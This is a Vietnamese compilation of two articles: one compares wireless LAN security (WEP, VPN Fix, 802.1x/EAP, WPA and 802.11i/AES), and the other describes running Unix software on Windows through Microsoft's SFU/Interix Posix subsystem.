Bảo mật là vấn đề rất quan trọng và đặc biệt rất được sự quan tâm của những doanh nghiệp. Không những thế, bảo mật cũng là nguyên nhân khiến doanh nghiệp e ngại khi cài đặt mạng cục bộ không dây (wireless LAN). Họ lo ngại về bảo mật trong WEP(Wired Equivalent Privacy), và quan tâm tới những giải pháp bảo mật mới thay thế an toàn hơn.

IEEE và Wi-Fi Alliance đã phát triển một giải pháp bảo mật hơn là: Bảo vệ truy cập Wi-Fi WPA (Wi-Fi Protected Access) và IEEE 802.11i (cũng được gọi là "WPA2 Certified" theo Wi-Fi Alliance) và một giải pháp khác mang tên VPN Fix cũng giúp tăng cường bảo mật mạng không dây.

Theo như Webtorial, WPA và 802.11i được sử dụng tương ứng là 29% và 22%. Mặt khác, 42% được sử dụng cho các "giải pháp tình thế" khác như: bảo mật hệ thống mạng riêng ảo VPN (Vitual Private Network) qua mạng cục bộ không dây.

Vậy, chúng ta nên lựa chọn giải pháp bảo mật nào cho mạng không dây?

WEP: Bảo mật quá tồi

WEP (Wired Equivalent Privacy) có nghĩa là bảo mật không dây tương đương với có dây. Thực ra, WEP đã đưa cả xác thực người dùng và đảm bảo an toàn dữ liệu vào cùng một phương thức không an toàn. WEP sử dụng một khoá mã hoá không thay đổi có độ dài 64 bit hoặc 128 bit, (nhưng trừ đi 24 bit sử dụng cho vector khởi tạo khoá mã hoá, nên độ dài khoá chỉ còn 40 bit hoặc 104 bit) được sử dụng để xác thực các thiết bị được phép truy cập vào trong mạng, và cũng được sử dụng để mã hoá truyền dữ liệu.

Rất đơn giản, các khoá mã hoá này dễ dàng bị "bẻ gãy" bởi thuật toán brute-force và kiểu tấn công thử lỗi (trial-and-error). Các phần mềm miễn phí như Airsnort hoặc WEPCrack sẽ cho phép hacker có thể phá vỡ khoá mã hoá nếu họ thu thập đủ từ 5 đến 10 triệu gói tin trên một mạng không dây. Với những khoá mã hoá 128 bit cũng không khá hơn: 24 bit cho khởi tạo mã hoá nên chỉ có 104 bit được sử dụng để mã hoá, và cách thức cũng giống như mã hoá có độ dài 64 bit nên mã hoá 128 bit cũng dễ dàng bị bẻ khoá. Ngoài ra, những điểm yếu trong những vector khởi tạo khoá mã hoá giúp cho hacker có thể tìm ra mật khẩu nhanh hơn với ít gói thông tin hơn rất nhiều.

Không dự đoán được những lỗi trong  khoá mã hoá, WEP có thể được tạo ra cách bảo mật mạnh mẽ  hơn nếu sử dụng một giao thức xác thực mà cung cấp mỗi khoá mã hoá mới cho mỗi phiên làm việc. Khoá mã hoá sẽ thay đổi trên mỗi phiên làm việc. Điều này sẽ gây khó khăn hơn cho hacker thu thập đủ các gói dữ liệu cần thiết để có thể bẽ gãy khoá bảo mật.

Giải pháp tình thế: VPN (Vitual Private Network) Fix

Nhận ra sự yếu kém của WEP, những người sử dụng doanh nghiệp đã khám phá ra một cách hiệu quả để bảo vệ mạng không dây WLAN của mình, được gọi là VPN Fix. Ý tưởng cơ bản của phương pháp này là coi những người sử dụng WLAN như những người sử dụng dịch vụ truy cập từ xa.

Trong cách cấu hình này, tất các những điểm truy cập WLAN, và cũng như các máy tính được kết nối vào các điểm truy cập này, đều được định nghĩa trong một mạng LAN ảo (Vitual LAN).  Trong cơ sở hạ tầng bảo mật, các thiết bị này được đối xử như là "không tin tưởng". Trước khi bất cứ các thiết bị WLAN được kết nối, chúng sẽ phải được sự cho phép từ thành phần bảo mật của mạng LAN. Dữ liệu cũng như kết nối của các thiết bị sẽ phải chạy qua một máy chủ xác thực như RADIUS chẳng hạn... Tiếp đó, kết nối sẽ được thiết lập thành một tuyến kết nối bảo mật đã được mã hoá bởi một giao thức bảo mật ví dụ như IPSec, giống như khi sử dụng các dịch vụ truy cập từ xa qua Internet.

Tuy nhiên, giải pháp này cũng không phải là hoàn hảo, VPN Fix cần lưu lượng VPN lớn hơn cho tường lửa, và cần phải tạo các thủ tục khởi tạo cho từng người sử dụng. Hơn nữa, IPSec lại không hỗ những thiết bị có nhiều chức năng riêng như thiết bị cầm tay, máy quét mã vạch... Cuối cùng, về quan điểm kiến trúc mạng, cấu hình theo VPN chỉ là một giải pháp tình thế chứ không phải là sự kết hợp với WLAN.

Giải pháp bảo mật bằng xác thực

Một sự thật là khi đã khám phá ra những lỗi về bảo mật trong mạng LAN không dây, ngành công nghiệp đã phải tốn rất nhiều công sức để giải quyết bài toán này. Một điều cần ghi nhớ là chúng ta cần phải đối diện với 2 vấn đề: xác thực và bảo mật thông tin. Xác thực nhằm đảm bảo chắc chắn người sử dụng hợp pháp có thể truy cập vào mạng. Bảo mật giữ cho truyền dữ liệu an toàn và không bị lấy trộm trên đường truyền.

Một trong những ưu điểm của xác thực là IEEE 802.1x sử dụng giao thức xác thực mở rộng EAP (Extensible Authentication Protocol). EAP thực sự là một cơ sở tốt cho xác thực, và có thể được sử dụng với một vài các giao thức xác thực khác. Những giao thức đó bao gồm MD5, Transport Layer Security (TLS), Tunneled TLS (TTLS), Protected EAP (PEAP) và Cisco's Lightweight EAP (LEAP).

Thật may mắn, sự lựa chọn giao thức xác thực chỉ cần vài yếu tố cơ bản. Trước hết, một cơ chế chỉ cần cung cấp một hoặc 2 cách xác thực, có thể gọi là sự xác thực qua lại (mutual authentication), có nghĩa là mạng sẽ xác thực người sử dụng và người sử dụng cũng sẽ xác thực lại mạng. Điều này rất quan trọng với mạng WLAN, bởi hacker có thể thêm điểm truy cập trái phép nào đó vào giữa các thiết bị mạng và các điểm truy cập hợp pháp (kiểu tấn công man-in-the-middle), để chặn và thay đổi các gói tin trên đường truyền dữ liệu. Và phương thức mã hoá MD5 không cung cấp xác thực qua lại nên cũng không được khuyến khích sử dụng WLAN.

Chuẩn mã hoá 802.11i hay WPA2

Một giải pháp về lâu dài là sử dụng 802.11i tương đương với WPA2, được chứng nhận bởi Wi-Fi Alliance. Chuẩn này sử dụng thuật toán mã hoá mạnh mẽ và được gọi là Chuẩn mã hoá nâng cao AES (Advanced Encryption Standard). AES sử dụng  thuật toán mã hoá đối xứng theo khối Rijndael, sử dụng khối mã hoá 128 bit, và 192 bit hoặc 256 bit.

Để đánh giá chuẩn mã hoá này, Viện nghiên cứu quốc gia về Chuẩn và Công nghệ của Mĩ, NIST (National Institute of Standards and Technology), đã thông qua thuật toán mã đối xứng này. Và chuẩn mã hoá này được sử dụng cho các cơ quan chính phủ Mĩ để bảo vệ các thông tin nhạy cảm. Nếu muốn biết chi tiết về cách làm việc của thuật toán Rijndael, bạn có thể ghé thăm http://en.wikipedia.org/wiki/Rijndael

Trong khi AES được xem như là bảo mật tốt hơn rất nhiều so với WEP 128 bit hoặc 168 bit DES (Digital Encryption Standard). Để đảm bảo về mặt hiệu năng, quá trình mã hoá cần được thực hiện trong các thiết bị phần cứng như tích hợp vào chip. Tuy nhiên, rất ít card mạng WLAN hoặc các điểm truy cập có hỗ trợ mã hoá bằng phần cứng tại thời điểm hiện tại. Hơn nữa, hầu hết các thiết bị cầm tay Wi-Fi và máy quét mã vạch đều không tương thích với chuẩn 802.11i.

WPA (Wi-Fi Protected Access)

Nhận thấy được những khó khăn khi nâng cấp lên 802.11i, Wi-Fi Alliance đã đưa ra giải pháp khác gọi là Wi-Fi Protected Access (WPA). Một trong những cải tiến quan trọng nhất của WPA là sử dụng hàm thay đổi khoá TKIP (Temporal Key Integrity Protocol). WPA cũng sử dụng thuật toán RC4 như WEP, nhưng mã hoá đầy đủ 128 bit. Và một đặc điểm khác là WPA thay đổi khoá cho mỗi gói tin. Các công cụ thu thập các gói tin để phá khoá mã hoá đều không thể thực hiện được với WPA. Bởi WPA thay đổi khoá liên tục nên hacker không bao giờ thu thập đủ dữ liệu mẫu để tìm ra mật khẩu. Không những thế, WPA còn bao gồm kiểm tra tính toàn vẹn của thông tin (Message Integrity Check). Vì vậy, dữ liệu không thể bị thay đổi trong khi đang ở trên đường truyền.

Một trong những điểm hấp dẫn nhất của WPA là không yêu cầu nâng cấp phần cứng. Các nâng cấp miễn phí về phần mềm cho hầu hết các card mạng và điểm truy cập sử dụng WPA rất dễ dàng và có sẵn. Tuy nhiên, WPA cũng không hỗ trợ các thiết bị cầm tay và máy quét mã vạch. Theo Wi-Fi Alliance, có khoảng 200 thiết bị đã được cấp chứng nhận tương thích WPA.

WPA có sẵn 2 lựa chọn: WPA Personal và WPA Enterprise. Cả 2 lựa chọn này đều sử dụng giao thức TKIP, và sự khác biệt chỉ là khoá khởi tạo mã hoá lúc đầu. WPA Personal thích hợp cho gia đình và mạng văn phòng nhỏ, khoá khởi tạo sẽ được sử dụng tại các điểm truy cập và thiết bị máy trạm. Trong khi đó, WPA cho doanh nghiệp cần một máy chủ xác thực và 802.1x để cung cấp các khoá khởi tạo cho mỗi phiên làm việc.

Trong khi Wi-Fi Alliance đã đưa ra WPA, và được coi là loại trừ mọi lỗ hổng dễ bị tấn công của WEP, nhưng người sử dụng vẫn không  thực sự tin tưởng vào WPA. Có một lỗ hổng trong WPA và lỗi này chỉ xảy ra với WPA Personal. Khi mà sử dụng hàm thay đổi khoá TKIP được sử dụng để tạo ra các khoá mã hoá bị phát hiện, nếu hacker có thể đoán được khoá khởi tạo hoặc một phần của mật khẩu, họ có thể xác định được toàn bộ mật khẩu, do đó có thể giải mã được dữ liệu. Tuy nhiên, lỗ hổng này cũng sẽ bị loại bỏ bằng cách sử dụng những khoá khởi tạo không dễ đoán (đừng sử dụng những từ như "PASSWORD" để làm mật khẩu).

Điều này cũng có nghĩa rằng kĩ thuật TKIP của WPA chỉ là giải pháp tạm thời , chưa cung cấp một phương thức bảo mật cao nhất. WPA chỉ thích hợp với những công ty mà không không truyền dữ liệu "mật" về những thương mại, hay các thông tin nhạy cảm... WPA cũng thích hợp với những hoạt động hàng ngày và mang tính thử nghiệm công nghệ.

Kết luận

Trong khi sử dụng VPN Fix qua các kết nối WLAN có thể là một ý tưởng hay và cũng sẽ là một hướng đi đúng. Nhưng sự không thuận tiện cũng như giá cả và tăng lưu lượng mạng cũng là rào cản cần vượt qua. Sự chuyển đổi sang 802.11i và mã hoá AES đem lại khả năng bảo mật cao nhất. Nhưng các tổ chức, cơ quan vẫn đang sử dụng hàng nghìn những card mạng WLAN không hỗ trợ chuẩn này. Hơn nữa AES không hỗ các thiết bị cầm tay và máy quét mã vạch hoặc các thiết bị khác... Đó là những giới hạn khi lựa chọn 802.11i.

Sự chuyển hướng sang WPA vẫn còn là những thử thách. Mặc dù, vẫn còn những lỗ hổng về bảo mật và có thể những lỗ hổng mới sẽ được phát hiện. Nhưng tại thời điểm này, WPA là lựa chọn tốt.

Sử Dụng Windows Cho Dịch Vụ Linux

Sớm hay muộn thì mỗi người quản trị cũng thấy rằng anh ta muốn một điều là có thể chạy các chương trình ứng dụng bằng nhiều hệ điều hành trên đồng thời một máy và sau đó cố gắng để tìm ra một giải pháp để làm được điều đó.

Có thể bạn thích sử dụng Microsoft Exchange nhưng bạn vẫn muốn có được các công cụ e-mail mã nguồn mở giống như SpamAssassin hay fetchmail. Hoặc có thể bạn đang sử dụng các ứng dụng Unix cho các dịch vụ mạng, nhưng bạn lại thực sự muốn chạy chúng dưới Windows để bạn có thể tích hợp chúng thành toàn bộ mô hình bảo mật mạng của bạn. Trong bất kỳ trường hợp nào bạn cũng mong muốn có thể chạy các chương trình tốt từ các hệ điều hành.

Trong trường hợp của tôi, tôi đã thực hiện giải pháp này khi đang nâng cấp một ứng dụng cũ và tôi đã mắc một lỗi trong việc mua một bo mạch chủ mới của Intel mà vẫn không thích hợp với sự hỗ trợ của driver Linux. Nếu tôi sử dụng hệ thống này thì nó có thể chạy được Windows, nhưng hầu hết các phần mềm của tôi trên hệ thống này chỉ được thiết kế cho Unix.
Giải pháp thông thường với tình trạng này là bắt buộc bản thân bạn phải chọn một platform bằng cả các danh sách chi tiết mang nặng tinh lợi và hại cho mỗi hệ điều hành và cả việc sử dụng các kỹ thuật tiến bộ đã được xác nhận và sau đó phát triển với các công cụ giúp ích có sẵn. Nhưng lý do bạn gặp tình trạng này là bởi vì bạn muốn sử dụng các ứng dụng từ các platform để phát triển hầu hết các ứng dụng luân phiên nghĩa là sử dụng cái nào tốt hơn, là tối ưu.

Một cái nữa ở đây có thể làm được đó là có thể chạy nhiều hệ thống song song hay sử dụng kỹ thuật ảo để chạy nhiều platform trên hệ thống đơn. Có một thuận lợi khi sử dụng phương pháp này là sẽ đem lại giá thành thấp đỡ tốn chi phí cho cả hai loại hệ điều hành. Mặc dù vậy cũng có những vấn đề phát sinh do người dùng sử dụng các phương pháp khác nhau trong các lĩnh vực khác nhau.

Nhưng có một lựa chọn khác mà không phải bất kỳ ai cũng biết đó là để chạy các ứng dụng Unix của bạn dưới Windows bằng việc sử dụng Posix, dịch vụ của Microsoft cho Unix. Theo mô hình này, hệ điều hành hoạt động thực là Windows trong khi hệ thống cung cấp Posix-compliant cho hệ điều hành. Các ứng dụng Unix cho rằng chúng đang sử dụng Unix thông thường, nhưng thực ra chúng đang sử dụng tài nguyên Windows.

Hình vẽ này sẽ giải thích rõ ràng hơn. Nó sẽ rất dài nhưng chỉ cần một đoạn ngắn trên màn hình cũng giúp bạn hiểu nó nghĩa như thế nào.

Trong ví dụ này, một người dùng Windows đã vào được Windows XP thông qua cấu trúc bash cục bộ bằng việc sử dụng Posix trong SFU. Môi trường nhìn trông khá giống với hệ thống Unix nhưng thực tế là Windows XP.

Posix cho Windows đã có trong một thời gian ngắn. Kỹ thuật này được gọi là Interix và được phát triển bởi công ty Softway Solutions đã sử dụng cùng với Windows NT. Microsoft có được công ty này vào mùa thu năm 1999 và sau đó kết hợp Interix với vài NFS khác và kỹ thuật NIS vào gói bán lẻ được gọi là các dịch vụ cho Unix 2.0 (cũng được biết đến như SFU). Bây giờ nó đã phát triển thành SFU v3.0 và SFU v3.5có thể download miễn phí (bạn có thể download tại đây).

Microsoft đang chuyển tiếp lại sản phẩm này bằng việc tích hợp nó vào Windows. Với thành phần Posix được đặt tên lại là Subsystem cho Unix Applications (SUA). Sự chuyển tiếp này bắt đầu với Windows Server R2 nhưng nó cũng là chiến lược đang hướng đến cho Vista. Việc ghi nhãn hiệu mới cũng biểu thị rằng SUA là bản viết lại của Posix – bao gồm sự hỗ trợ 64-bit platform, các giao diện Open Database Connectivity (ODBC), và sự tích hợp hơn với Microsoft Visual Studio. Nhưng với các ứng dụng user-space thì nó vẫn là Interix.

Về cơ bản, Posix ánh xạ các tài nguyên Windows vào môi trường Unix bằng việc cung cấp một sự lựa chọn “cá nhân” trong Windows thông qua một thiết lập các APIs và các tuyên bố giống Unix. Ví dụ, các account người dùng không được lưu trong file /etc/passwd truyền thống mà thay vì đó được truy cập thông qua các thư viện gọi giống như getpwnam và getpwuid. Sau đó Posix ánh xạ đến hệ thống xác nhận Windows thông qua SAM database API đã có.

Mô hình này cho phép sự xác nhận Windows lưu công việc liền mạch, không quan tâm đến lưu bản thân nó là một dữ liệu nhóm và người dùng cục bộ, một NT domain đã có, hay một Active Directory domain. Mặt xấu của vấn đề này là dữ liệu tài khoản người dùng bị giới hạn để có thể lưu những gì trong SAM database. Thành phần NIC server của SFU cung cấp cho Posix là có thể mở rộng cho Active Directory, nhưng những thuộc tính này lại không được sử dụng bởi vì Posix chỉ có thể làm việc được với SAM database API.

Tương tự như vậy, hệ thống file Posix khá đơn giản cho các file hệ thống của Windows, nó có thể chỉ sử dụng những gì mà Windows có thể cung cấp. Đường dẫn của các hệ thống file Unix được ánh xạ đến C:\SFU một cách mặc định mặc dù các thành phần khác của hệ thống file Windows có thể được truy cập thông qua biệt hiệu thiết bị. (ví dụ, đường dẫn của ổ C có thể được truy cập thông qua /dev/fs/C ).

Khi không có các định vị được gắn để thi hành thì chỉ có cách truy cập vào các hệ thống file từ xa bằng Posix là thiết lập một kết nối trong Windows. Ví dụ, nếu bạn cần sử dụng một chia sẻ SMB từ xa cho một thư mục gốc của người dùng thì bạn cần bảo đảm rằng tài nguyên phải được ánh xạ đến kí tự ổ đĩa bởi Windows trong suốt quá trình login cả bằng các thiết lập profile của người dùng và cả bằng việc sử dụng một kịch bản login. (Điều này bạn có thể xem trên hình đã cho ở trên. Nó thể hiện thư mục gốc của người dùng ánh xạ đến Z: hoặc /dev/fs/Z trong Posix). Đây cũng có thể là các yếu điểm khác của sự tích hợp trong một vài trường hợp bởi vì thuộc tính thư mục gốc của người dùng cũng được sử dụng cho thư mục gốc Posix của người dùng. Bạn mắc kẹt với UNC và các đường dẫn kĩ tự ổ đĩa cho thư mục gốc SFU trong khi các hệ thống từ xa có thể sử dụng các điểm và các đường dẫn NFS.

Windows và Posix cũng chia sẻ một môi trường lệnh chung, vì vậy bạn có thể gọi Windows từ bên trong Unix shell đơn giản bằng việc gọi thi hành giống như bạn sẽ từ bất kỳ một dấu nhắc lệnh nào. Đổi lại cũng như vậy như là việc sử dụng “1s” để gọi thư mục kiểu Unix bằng cách liệt kê từ bên trong trình lệnh CMD. Nhưng nếu bạn cần toàn bộ Posix (bao gồm việc ánh xạ các file và tương tự như vậy) thì bạn cần phải sử dụng lệnh POSIX.EXE như load đầu vào cho lệnh kiểu Unix để tạo một môi trường đầy đủ.

Một vùng không kết nối ở đây là trong các dịch vụ nền: Posix bao gồm các kịch bản khởi động bản thân nó /etc/init.d và lịch trình cron hoàn toàn độc lập với dịch vụ Windows và lịch trình nhiệm vụ. Sự thử nghiệm thể hiện rằng là hoàn toàn có thể khởi chạy một vài dịch vụ Unix như các dịch vụ Windows giả mạo bằng việc sử dụng tiện tích "instsrv" từ Windows Resource Kit và "psxrun" (POSIX.EXE với tháo bỏ các chức năng I/O kết cuối) mặc dù đây là cách hack thô thiển nhất. Sẽ rất tốt nếu Microsoft có thể tìm được một wApart từ các thành phần cơ bản. SFU cũng bao gồm các điểm của các tiện ích Unix cũ cũng như các công cụ mới cần thiết cho biên dịch những lệnh mới bằng các công cụ GNU giống như gee và gmake. Màn hình dưới đây thể hiện nội dung của thư mục /bin trong cài đặt mặc định và một vài update.

Phụ thuộc vào bạn sử dụng SFU hay SUA mà các công cụ sẽ thực hiện gói cài đặt trực tiếp (SFU) hay sẽ dowload từ kho của Microsoft như một phần của quá trình cài đặt.

Interop Systems, một công ty được thành lập bởi các nhân viên gốc của Softway Systems cũng duy trì các port của một vài ứng dụng mã nguồn mở. Một vài gói có thể update đơn giản các tiện ích của SFU và SUA.c Nhưng Interop Systems lại duy trì các port khác với các ứng dụng chính giống như OpenSSH và Apache… Interop Systems tính một lần lệ phí là 20$ cho việc truycập đến các kho lưu trữ của nó.

Bạn cũng có thể thử tại các ứng dụng port bằng việc sử dụng các công cụ phát triển (hay các phiên bản update từ Interop Systems). Theo kinh nghiệm của chúng tôi, điều này có thể làm cho một vài thứ trở lên dễ dàng trong khi các ứng dụng khác là rất khó khắn với nó. Nói chung, nếu tarball nguồn sử dụng kịch bản GNU configure hỗ trợ Interix như một platform và ứng dụng không muốn làm việc trực tiếp với các tài nguyên Unix rõ ràng như /etc/passwd thì bạn có một cơ hội tốt để biên dịch thành công ứng dụng mặc dù nó vẫn không chạy. Nếu ứng dụng được viết đến các platform đích rõ ràng và nó không hỗ trợ cho Interix như một target thì bạn có thể không có được nó trừ khi bạn tốn nhiều ông sức để hack code.

Như ví dụ mẫu ở trên, chúng tôi có thể có được phiên bản mới nhất của Berkeley DB để biên dịch và chạy không có vấn đề gì. Chúng tôi cũng có thể có được SpamAssassin và các modul hỗ trợ khác để biên dịch và chạy (bao gồm Net::LDAP, mặc dù chúng tôi phải nâng cấp Perl từ Interop Systems). Vài modul của Perl khác sẽ không dịch hay sẽ không qua giai đoạn "make test". Khi chúng tôi không có được các thư viện CMU SASL để biên dịch, trong khi đó UW IMAPD và Cyrus IMAP lại được viết cho các platform cụ thể mà không hỗ trợ cho Interix. Vì vậy chúng tôi không thể biên dịch được với chúng.

Ở đây chúng tôi có hai ứng dụng Unix quan trọng mà chúng tôi thực sự cần cho hệ thống này là OpenSSH và Squid, và chúng tôi đã dễ dàng sử dụng các dịch vụ Windows cho các thứ ứng dụng khác. Trong vài trường hợp, giống như quản lý máy in chúng tôi đã sai lệch đôi chút với các ứng dụng Windows. Khi OpenSSH và Squid là có sẵn từ Interop Systems thì nó thực sự là dễ dàng. Ngắn gọn hơn là chúng tôi có thể chạy các ứng dụng mã nguồn mở tốt dưới Windows như chúng vẫn từng chạy trên Unix, và đây là một lợi ích từ việc tích hợp chặt chẽ với môi trường Windows.